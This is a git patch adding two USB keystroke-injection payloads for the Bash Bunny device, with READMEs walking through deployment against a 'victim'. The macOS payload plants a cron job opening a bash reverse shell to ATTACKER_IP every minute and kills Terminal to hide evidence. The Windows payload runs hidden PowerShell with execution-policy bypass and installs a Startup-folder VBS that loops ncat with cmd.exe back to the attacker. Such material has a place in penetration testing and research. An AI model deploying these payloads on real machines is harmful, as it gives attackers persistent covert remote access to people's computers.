From 7f902403d49961614d3d2cfd34c4db16a3ea5441 Mon Sep 17 00:00:00 2001 From: KeenanV Date: Sun, 21 Jan 2018 15:39:14 -0800 Subject: [PATCH] Persistent Reverse Shells for MacOS and Windows 10 (#306) --- .../MacPersistentReverseShell/README.md | 44 ++++++++++++++++++ .../MacPersistentReverseShell/payload.txt | 32 +++++++++++++ .../WindowsPersistentReverseShell/README.md | 45 +++++++++++++++++++ .../WindowsPersistentReverseShell/payload.txt | 18 ++++++++ .../persistence.vbs | 7 +++ .../WindowsPersistentReverseShell/run.ps1 | 20 +++++++++ 6 files changed, 166 insertions(+) create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/README.md create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/payload.txt create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/README.md create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 diff --git a/payloads/library/remote_access/MacPersistentReverseShell/README.md b/payloads/library/remote_access/MacPersistentReverseShell/README.md new file mode 100644 index 00000000..591202e4 --- /dev/null +++ b/payloads/library/remote_access/MacPersistentReverseShell/README.md @@ -0,0 +1,44 @@ +# Reverse Shell Mac for Bash Bunny + +* Author: 0dyss3us (KeenanV) +* Version: 1.2 + +## Description + +Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. +* Targets MacOS +* Connection can be closed and reconnected at any time +* Deploys in roughly 23 sec +* Works well with NetCat as the listener + +## Requirements + +Have a working Bash Bunny :) + +## STATUS + +| LED | STATUS | +| -------------------- | ---------------------------- | +| Purple | Setup | +| Amber (Single Blink) | Launching Terminal | +| Amber (Double Blink) | Creating cron job | +| White (Fast Blink) | Cleaning up | +| Green | Finished | + +## Configuration and Execution + +1. Plug in Bash Bunny in arming mode +2. Move files from MacPersistentReverseShell to either switch folder +3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:) +5. Unplug Bash Bunny and switch it to the position the payload is loaded on +6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) +7. Unplug the Bash Bunny and go to attacker's machine +8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat) + * If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh) + * If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe. +9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) +10. Once a bash shell prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in + +## Discussion + +[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post. diff --git a/payloads/library/remote_access/MacPersistentReverseShell/payload.txt b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt new file mode 100644 index 00000000..f25b9034 --- /dev/null +++ b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt @@ -0,0 +1,32 @@ +# Title: Mac Persistent Reverse Shell +# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host +# Author: 0dyss3us (KeenanV) +# Props: +# Version: 1.2 +# Category: Remote Access +# Target: MacOS +# Attackmodes: HID, Storage + +# Sets attack modes and stores current switch position +LED SETUP +ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E +GET_SWITCH_POSITION + +# Opens the terminal +LED STAGE1 +RUN OSX terminal +Q DELAY 2000 + +# Makes a cron job that will run once every minute +Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab - +Q ENTER +Q DELAY 2000 + +LED CLEANUP +# Clears and kills the terminal to hide the evidence +Q STRING clear +Q ENTER +Q DELAY 500 +Q STRING killall Terminal +Q ENTER +LED FINISH diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/README.md b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md new file mode 100644 index 00000000..2b318c6c --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md @@ -0,0 +1,45 @@ +# Windows Persistent Reverse Shell for Bash Bunny + +* Author: 0dyss3us (KeenanV) +* Version: 1.1 + +## Description + +Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. +* Targets Windows 10 (working on support for older versions) +* Connection can be closed and reconnected at any time +* Deploys in roughly 15-20 sec +* Works with NetCat + +## Requirements + +Have a working Bash Bunny :) + +## STATUS + +| LED | STATUS | +| -------------------- | ------------------------------ | +| Purple | Setup | +| Amber (Single Blink) | Installing and running scripts | +| Green | Finished | + +## Installation and Execution + +1. Plug in Bash Bunny in arming mode +2. Move files from WindowsPersistentReverseShell to either switch folder +3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder. +4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:) +5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny +6. Save the persistence.vbs file +7. Unplug Bash Bunny and switch it to the position the payload is loaded on +8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) +9. Unplug the Bash Bunny and go to attacker's machine +10. Listen on the port you chose in the persistence.vbs file on NetCat + * Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs) + * If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory. +11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) +12. Once a Windows cmd prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect at any time as long as the user is logged in + +## Discussion + +[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt new file mode 100644 index 00000000..fc89bd61 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt @@ -0,0 +1,18 @@ +# Title: NetCat Reverse Shell Windows +# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat +# Author: 0dyss3us (KeenanV) +# Props: +# Version: 1.0 +# Category: Remote Access +# Target: Windows 10 +# Attackmodes: HID, Storage + +#Sets attack mode and stores current switch position +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +#Runs Powershell script which puts a .vbs file in the startup folder and runs it +LED ATTACK +RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" +LED FINISH \ No newline at end of file diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs new file mode 100644 index 00000000..f6db2e03 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs @@ -0,0 +1,7 @@ +Dim ncShell +Set ncShell = WScript.CreateObject("WScript.shell") + +Do while True: + ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true + WScript.Sleep(60000) +loop diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 new file mode 100644 index 00000000..b6b81438 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 @@ -0,0 +1,20 @@ +$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name +$user = $env:UserName +$NetCatFile = $Drive + "payloads\switch1\ncat.exe" +$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs" +$DestinationFile1 = "C:\temp\ncat.exe" +$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs") + +If ((Test-Path $DestinationFile1) -eq $false){ + New-Item -ItemType File -Path $DestinationFile1 -Force +} +If ((Test-Path $DestinationFile2) -eq $false){ + New-Item -ItemType File -Path $DestinationFile2 -Force +} + +Copy-Item -Path $NetCatFile -Destination $DestinationFile1 +Copy-Item -Path $PersistenceFile -Destination $DestinationFile2 + +Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") + +Start-Process cmd -ArgumentList "/c start persistence.vbs" \ No newline at end of file